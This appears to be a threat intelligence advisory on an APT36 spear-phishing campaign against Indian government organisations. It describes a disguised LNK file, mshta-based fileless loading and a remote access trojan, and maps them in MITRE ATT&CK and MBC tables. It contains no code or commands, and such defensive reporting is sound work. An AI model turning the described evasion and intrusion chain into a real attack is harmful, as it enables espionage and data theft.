EXECUTIVE SUMMARY:
A cyber espionage campaign attributed to APT36 has been identified targeting Indian government and strategic sector organizations, leveraging a deceptive multi-stage malware framework delivered via spear phishing. The attack uses a weaponized Windows shortcut (LNK) file that appears as a legitimate PDF to deceive users. Upon activation, trusted system binaries launch hidden scripts that fetch additional components, enabling covert execution without writing traditional malware files to disk. This targeting reflects a focused effort by APT36 to infiltrate sensitive environments through social engineering and stealthy delivery techniques.
The intrusion begins with a spear‑phishing email containing a compressed archive that holds a double‑extension shortcut file disguised as a PDF document. Due to how Windows handles file extensions, the malicious shortcut appears normal and entices victims to interact. When executed, it invokes a legitimate system binary to fetch a script from a remote location, which decrypts and loads subsequent components directly into memory, avoiding disk writes. The first payload weakens security controls in the operating environment, while a second fileless dynamic link library (DLL) acts as a fully featured Remote Access Trojan. This RAT establishes encrypted command‑and‑control communications, profiles the host system including installed antivirus products, adapts persistence mechanisms accordingly, and supports a broad set of functions such as remote command execution, data exfiltration, file management, screen capture, and clipboard monitoring. The malware constructs a decoy PDF to maintain user trust while operating covertly and adjusts its persistence and execution based on defensive software detected on the host.
This operation demonstrates a significant escalation in targeted espionage tactics, leveraging file format deception, living‑off‑the‑land binaries, and in‑memory execution to evade conventional defenses. The multi‑stage, adaptive nature of the malware underscores the adversarys focus on long‑term access, covert surveillance, and strategic data collection. Organizations operating in similarly sensitive environments should prioritize enhanced detection measures, user awareness training, and behavior‑based security controls to mitigate the risk posed by advanced persistent threat campaigns employing such stealthy, modular techniques.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| T1059.005 | Visual Basic | ||
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| T1112 | Modify Registry | — | |
| T1055.012 | Process Injection | Process Hollowing | |
| T1036.004 | Masquerading | Masquerade Task or Service | |
| T1027.001 | Obfuscated Files or Information | Binary Padding | |
| T1070.004 | Indicator Removal | File Deletion | |
| T1202 | Indirect Command Execution | — | |
| T1497.001 | Virtualization / Sandbox Evasion | System Checks | |
| T1564.001 | Hide Artifacts | Hidden Files and Directories | |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| T1539 | Steal Web Session Cookie | — | |
| Discovery | T1082 | System Information Discovery | — |
| T1057 | Process Discovery | — | |
| T1083 | File and Directory Discovery | — | |
| T1518.001 | Software Discovery | Security Software Discovery | |
| Collection | T1113 | Screen Capture | — |
| T1115 | Clipboard Data | — | |
| T1005 | Data from Local System | — | |
| T1560.001 | Archive Collected Data | Archive via Utility | |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| T1095 | Non-Application Layer Protocol | — | |
| T1573.002 | Encrypted Channel | Asymmetric Cryptography | |
| T1105 | Ingress Tool Transfer | — | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
| Impact | T1565.001 | Data Manipulation | Stored Data Manipulation |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| Anti-Behavioral Analysis | B0001 | Debugger Detection |
| B0004 | Emulator Detection | |
| B0009 | Virtual Machine Detection | |
| Anti-Static Analysis | B0012 | Disassembler Evasion |
| Collection | E1056 | Input Capture |
| E1113 | Screen Capture | |
| Command and Control | B0030 | C2 Communication |
| Defense Evasion | B0025 | Conditional Execution |
| B0027 | Alternative Installation Location | |
| E1027 | Obfuscated Files or Information | |
| F0001 | Software Packing | |
| Execution | B0011 | Remote Commands |
| Lateral Movement | E1105 | Ingress Tool Transfer |
| Persistence | B0035 | Shutdown Event |
| F0012 | Registry Run Keys / Startup Folder | |
| Privilege Escalation | E1055 | Process Injection |
REFERENCES:
The following reports contain further technical details: